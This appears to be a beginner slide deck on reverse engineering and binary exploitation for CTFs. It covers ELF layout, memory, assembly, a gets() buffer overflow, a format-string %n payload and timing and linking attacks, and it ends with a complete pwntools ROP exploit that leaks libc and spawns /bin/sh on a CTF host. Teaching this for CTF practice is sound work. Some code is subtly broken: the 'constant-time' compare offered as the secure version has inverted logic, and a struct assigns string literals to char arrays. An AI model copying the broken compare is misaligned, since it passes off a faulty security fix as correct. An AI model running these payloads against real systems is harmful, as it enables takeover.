Reverse Engineering & Exploitation (pwn) - 101
Who Am I?
Graduated from UMD in '19 with a BS in CS. Involved in CSEC and helped create challenges for UMDCTF-2018/19.
Now I have to be an adult and work our lives away, but still love CTFs and connecting with the community! (And we love our jobs! #cyberroolz)
Mike - WittsEnd2
Software Engineer - C, Python, & Web
Reverse Engineer
Graduate Student - M. Eng. Cyber Sec.
Hobbies: CTFs/Dev Projects, Entrepreneurship, Baseball, Music, Stocks
How to Reach Me
#include <stdlib.h>
typedef struct Contact {
char discord[32]; // <- best way to contact me
char twitter[32];
char github[32];
} Contact;
struct Contact *shareContact() {
Contact *contactInfo = malloc(sizeof(struct Contact));
contactInfo->discord = "WittsEnd2#9274";
contactInfo->twitter = "@RagnarSecurity";
contactInfo->github = "WittsEnd2";
return contactInfo;
}
Agenda
- Define Reverse Engineering and Exploitation (pwn)
- Understanding How Files Are Compiled
- Memory
- Analysis and Assembly
- Vulnerabilities
- Additional Tools
What the F*** is pwn and Reverse Engineering?
Definition 1: It's Magic
Reverse Engineering
A process of extracting knowledge from engineered artifacts.
Binary Exploitation
Binary exploitation is the process of subverting a compiled application such that it violates some trust boundary in a way that is advantageous to the attacker.
The Header
The header contains the blueprint to the program you are analyzing!
Layout of a Compiled ELF File
Contains data about linking and execution
An array of entries where each entry describes a segment or other info in regarding the file
Segments contain either code or data, related to the program's execution.
The section header table has all of the information necessary to locate and isolate each of the file's sections.
ELF Header
#define EI_NIDENT 16
typedef struct {
unsigned char e_ident[EI_NIDENT];
Elf32_Half e_type;
Elf32_Half e_machine;
Elf32_Word e_version;
Elf32_Addr e_entry;
Elf32_Off e_phoff;
Elf32_Off e_shoff;
Elf32_Word e_flags;
Elf32_Half e_ehsize;
Elf32_Half e_phentsize;
Elf32_Half e_phnum;
Elf32_Half e_shentsize;
Elf32_Half e_shnum;
Elf32_Half e_shtrndx;
} Elf32_Ehdr;
$ readelf -h a.out ###Output modified slightly
Magic: 7f 45 4c 46 \x7fELF
Class: ELF32
Data: little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: EXEC
Machine: Intel 80386
Version: 0x1
Entry point address: 0x8048430
Start of program headers: 52
Start of section headers: 8588
Flags: 0x0
Size of this header: 52 (bytes)
Size of program headers: 32 (bytes)
Number of program headers: 9
Size of section headers: 40 (bytes)
Number of section headers: 35
Section header string table index: 34
e_ -- elf
ph -- program header
sh -- section header
off -- offset
ent -- entry
Section Header
TRY:
$ readelf -S /bin/bash
### modified output
[Nr] Name Type
[ 0] NULL
[ 1] .interp PROGBITS
[ 2] .note.ABI-tag NOTE
[ 3] .note.gnu.build-i NOTE
[ 4] .gnu.hash GNU_HASH
[ 5] .dynsym DYNSYM
[ 6] .dynstr STRTAB
[ 7] .gnu.version VERSYM
[ 8] .gnu.version_r VERNEED
[ 9] .rela.dyn RELA
[10] .rela.plt RELA
[11] .init PROGBITS
[12] .plt PROGBITS
[13] .plt.got PROGBITS
[14] .text PROGBITS
[15] .fini PROGBITS
[16] .rodata PROGBITS
[17] .eh_frame_hdr PROGBITS
[18] .eh_frame PROGBITS
[19] .init_array INIT_ARRAY
[20] .fini_array FINI_ARRAY
[21] .data.rel.ro PROGBITS
[22] .dynamic DYNAMIC
[23] .got PROGBITS
[24] .data PROGBITS
[25] .bss NOBITS
[26] .gnu_debuglink PROGBITS
[27] .shstrtab STRTAB
What is a section header?
What are some sections that are useful to us?
.text
.got
.data
A well defined header that gives information on a section of the binary which is unstructured.
Program Header
Program headers indicates how segments required for execution are to be loaded into virtual memory.
There exists a Sections to Segment mapping that specifies which sections are part of which segments.
Most disassemblers recreated the does all analysis based on virtual addressing
More ELF File Info:
https://slides.com/drakemp/hacs408e-elf
More PE File Info:
https://slides.com/drakemp/hacs408e-pe
Memory
Paging
Organizes memory (or disk) into chunks
Typically between 512 bytes and 8192 bytes
Page Table
Groups Tables Together
A page that contains pointers to Pages
How Addresses Are Built
[Page Pointer][Intermediate][Offset]
Paging Algorithms
-
First-in First-out (FIFO)
- Performs poorly in practical applications
- Many variations, e.g. second chance
-
Least Recently Used (LRU)
- Tracks page usage over short period of time
- Near optimal performance… in theory
- Can be expensive to implement
-
Random
- Performs better than FIFO!
- Fallback algorithm when LRU degrades
Memory Layout - 32 Bit
Primary places we work with memory are...
- Stack
- Heap
BSS Section
Uninitialized Static and Global Variables
Data Section
Initialized Static and Global Variables
The Stack - 32 bit
We are assuming integers and Intel Architecture in this example
The Stack - 32 bit
Local Var 1
Local Var 3
Local Var 2
Param 3
Param 2
Param 1
We are assuming integers and Intel Architecture in this example
Data Structures
ebp
ret
param1
int var 1
int arr[2]
int arr[1]
int arr[0]
int arr[3]
Important Things To Know
- Size of Types of Data (int, float, etc.)
- Pointers
- Structs & Linked List
- Arrays
Register
- The processor's "memory"
- Data that is extremely fast to access
- Doesn't hold a lot of data
- Can access portions of registers too
Static And Dynamic Analysis
Static
Learning how programs are behave without running the executable.
- Lots of assembly.
- Requires disassembler.
- The "cool" way of reversing.
- Should be last resort (unless you have source code).
Dynamic
Learning how programs behave by running the executable.
- Use of debuggers and tools like strace/ltrace.
- Can help pinpoint errors and spots for further analysis.
- Helpful to have knowledge of static analysis to compliment.
Assembly
Byte Code That is Human Readable
- Required to do RE
- Many architectures: (x86, ARM)
- Two primary syntax: Intel and ATT
- Intel: inst, dest, src1, src2, ...
- Att: inst, src1, src2, ..., dest
Processor manuals are your friend!
PUSH EBP
MOV EBP,ESP
AND ESP,0xfffffff0
SUB ESP,0x20
CMP dword ptr [EBP + param_1],0x2
JLE LAB_0804852c
MOV EAX,dword ptr [EBP + param_2]
ADD EAX,0x4
MOV EAX,dword ptr [EAX]
MOV dword ptr [ESP]=>local_30,EAX
CALL atoi ; int atoi(char * __nptr)
MOV dword ptr [ESP + local_18],EAX
MOVSX ECX,AX
MOV EDX,dword ptr [ESP + local_18]
MOV EAX,dword ptr [ESP + local_14]
MOV dword ptr [ESP + local_24],ECX
MOV dword ptr [ESP + local_28],EDX
MOV dword ptr [ESP + local_2c],EAX
MOV dword ptr [ESP]=>local_30,s_%d_*_%d_==_%d_0804 = "%d * %d == %d\n"
CALL printf int printf(char * __format, ...)
JMP LAB_0804859c
LAB_08048590
MOV dword ptr [ESP]=>local_30,s_Something_went_hor = "Something went horribly wrong"
CALL puts int puts(char * __s)
LAB_0804859c
MOV EAX,0x0
LAB_080485a1
LEAVE
RET
Exploitation (pwn)
Buffer Overflow
- Overwriting Memory To Get Desired Execution.
- Caused by unbound stdin
- gets
- printf
- fgets
- Can be both stack or heap based - How are they different?
Input
int main() {
char buff[12];
gets(buff);
return 0;
}
Buffer Overflow
- Overwriting Memory To Get Desired Execution.
- Caused by unbound stdin
- gets
- printf
- fgets
- Can be both stack or heap based - How are they different?
Input
Overwrite original return address to either shellcode or another address in the program.
Format String
- Occurs when the submitted data of an input string is evaluated as a command by the application.
- Evaluate the stack via common format strings (e.g. %x, %s, %p)
-
Add malicious code using %n
- Stores the number of bytes written to the screen thus far to an int*
#include <stdio.h>
void main(int argc, char **argv)
{
// This line is safe
printf("%s\n", argv[1]);
// This line is vulnerable
printf(argv[1]);
}
Let's say: ABCDABCD %p.%p.%261$p.%4n is our payload. This will execute *0x44434241 = 35.
Why is that?
Timing Attacks
-
Based on either delays or inconsistencies with execution time.
- If we know long it takes for the thing we want to execute, we can use that to attack the software.
bool insecureStringCompare(void *a, void *b, size_t length) {
const char *ca = a, *cb = b;
for (size_t i = 0; i < length; i++)
if (ca[i] != cb[i])
return false;
return true;
}
bool constantTimeStringCompare(void *a, void *b, size_t length) {
const char *ca = a, *cb = b;
bool result = true;
for (size_t i = 0; i < length; i++)
result &= ca[i] != cb[i];
return result;
}
Which is vulnerable?
Linking Attacks
What is linking?
- Linking allows the program to execute code from the outside.
- Reduces the size of the program, and compilation time.
- Linux: .so
- Windows: .dll
Common Linked Functions:
- printf
- puts
- atoi
- etc...
Linking Attacks
We are redefining what the binary's link is referencing to so that we can trick it to execute what we want!
Essentially inserting malicious code in place of where valid code should be.
Tools
Debuggers
Disassemblers
- IDA Pro
- Ghidra
- Binary Ninja
- Radare2
- Cutter
Translates machine code to assembly (or even C code).
pwntools
- Framework to make exploitation easier
- Commonly used for ctf challenges
- ROP Chain Builder (no need to look for gadgets).
- Format String Builder
http://docs.pwntools.com/en/stable/
from pwn import *
context(os='linux', arch='amd64')
# p = process('./return-to-what')
p = remote('chal.duc.tf', 30003)
binary = ELF('./return-to-what')
rop = ROP(binary)
libc = ELF('./libc6_2.27-3ubuntu1_amd64.so')
junk = b'A'*56
rop.puts(binary.got['puts'])
rop.call(binary.symbols['vuln'])
log.info("Stage 1 ROP chain:\n" + str(rop.dump()))
stage1 = junk + rop.chain()
p.recvuntil('Where would you like to return to?')
p.sendline(stage1)
p.recvline()
leaked_puts = p.recvline()[:8].strip().ljust(8,b'\x00')
log.success ("Leaked puts@GLIBC: " + str(leaked_puts))
leaked_puts=u64(leaked_puts)
libc.address = leaked_puts - libc.symbols['puts']
rop2 = ROP(libc)
rop2.system(next(libc.search(b'/bin/sh\x00')), 0, 0)
# rop2 = ROP(binary)
# rop2.call(libc.symbols['system'], (next(libc.search(b'/bin/sh\x00')), ))
log.info("Stage II ROP Chain: \n" + rop2.dump())
stageII = junk + rop2.chain()
p.recvuntil('Where would you like to return to?')
p.sendline(stageII)
p.recvline()
p.interactive()
The Giant List of Other Tools
- Strace
- Ltrace
- Upx
- GEF/Peda
- UPX
- WinDBG
- GDB
- PEDA
- GEF
- OllyDbg
- PEView
- readpe
- readelf
- Wireshark
- IDA
- Binary Ninja
- Cutter
- Radare2
- Ghidra
- angr
- capstone
Practice Problems
https://github.com/Ragnar-Security/Practice-Problems
Learn More
http://security.cs.rpi.edu/courses/binexp-spring2015/
https://sldies.com/drakemp
https://slides.com/ragnarsecurity (will post more)
Do some CTFS
Work Cited
https://slides.com/drakemp
Allen Hazelton - ENPM696
Dharmalingam Ganesan - ENPM691 (Linking)
How To Pwn/Rev 101
By Ragnar Security
How To Pwn/Rev 101
t
- 493